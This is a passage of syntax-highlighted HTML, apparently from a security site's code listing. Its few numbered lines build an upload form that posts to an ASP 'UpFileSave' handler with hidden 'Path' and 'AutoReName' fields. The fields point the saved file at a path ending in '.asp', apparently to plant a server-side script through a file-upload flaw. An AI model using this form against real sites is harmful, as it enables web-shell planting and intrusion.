class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">enctype</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"multipart/form-data"</code><code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">action</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"<a style="color: blue !important;" href="http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp">http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp</a>"</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&gt;</code></span></span></div>
<div class="line alt2" style="outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><code class="number" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #5c5c5c !important; padding-top: 0px !important; padding-right: 0.3em !important; padding-bottom: 0px !important; padding-left: 0px !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: right !important; float: left !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: 3em !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; background-position: initial initial !important; margin: 0px !important; border: 0px !important initial !important initial !important;">2.</code><span class="content" style="margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 3.3em !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 3px !important; border-style: initial !important; border-color: initial !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: #f8f8f8 !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; border-left-style: solid !important; border-left-color: #6ce26c !important; color: #000000 !important; background-position: initial initial !important;"><span class="block" style="margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 28px !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: url(http://www.pcsec.org/PLUGIN/Codelight/SyntaxHighlighter/Styles/wrapping.png) !important; background-repeat: no-repeat !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; text-indent: -1.5em !important; background-position: 0px 1.1em !important; border: 0px !important initial !important initial !important;"><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&lt;</code><code class="keyword" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #006699 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: bold !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">input</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">type</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"hidden"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">name</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"AutoReName"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">value</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"2"</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&gt;&lt;</code><code class="keyword" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #006699 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: bold !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">br</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&gt;</code></span></span></div>
<div class="line alt1" style="outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><code class="number" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #5c5c5c !important; padding-top: 0px !important; padding-right: 0.3em !important; padding-bottom: 0px !important; padding-left: 0px !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: right !important; float: left !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: 3em !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; background-position: initial initial !important; margin: 0px !important; border: 0px !important initial !important initial !important;">3.</code><span class="content" style="margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 3.3em !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; border-top-width: 0px !important; border-right-width: 0px !important; border-bottom-width: 0px !important; border-left-width: 3px !important; border-style: initial !important; border-color: initial !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: #ffffff !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; border-left-style: solid !important; border-left-color: #6ce26c !important; color: #000000 !important; background-position: initial initial !important;"><span class="block" style="margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 28px !important; padding-top: 0px !important; padding-right: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: url(http://www.pcsec.org/PLUGIN/Codelight/SyntaxHighlighter/Styles/wrapping.png) !important; background-repeat: no-repeat !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; display: block !important; text-indent: -1.5em !important; background-position: 0px 1.1em !important; border: 0px !important initial !important initial !important;"><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&lt;</code><code class="keyword" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #006699 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: bold !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">input</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">type</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"hidden"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">name</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"Path"</code> <code class="color1" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #808080 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">value</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">=</code><code class="string" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: blue !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">"/userfiles/06150583700/aaa.asp"</code><code class="plain" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #000000 !important; outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;">&gt;</code></span></span></div>
<div class="line alt2" style="outline-width: 0px !important; outline-style: initial !important; outline-color: initial !important; background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; text-align: left !important; float: none !important; vertical-align: baseline !important; position: static !important; left: auto !important; top: auto !important; right: auto !important; bottom: auto !important; height: auto !important; width: auto !important; line-height: 1.1em !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-weight: normal !important; font-style: normal !important; font-size: 1em !important; background-position: initial initial !important; padding: 0px !important; margin: 0px !important; border: 0px !important initial !important initial !important;"><code class="number" style="background-image: none !important; background-repeat: initial !important; background-attachment: initial !important; -webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-color: initial !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; color: #5c5c5c !important; padding-top: 0px !important; padding-right: 0.3em !important; padding-bottom: 0px !important; padding-left: 0px !important; outline-width: 0px !important; outline-style: initial 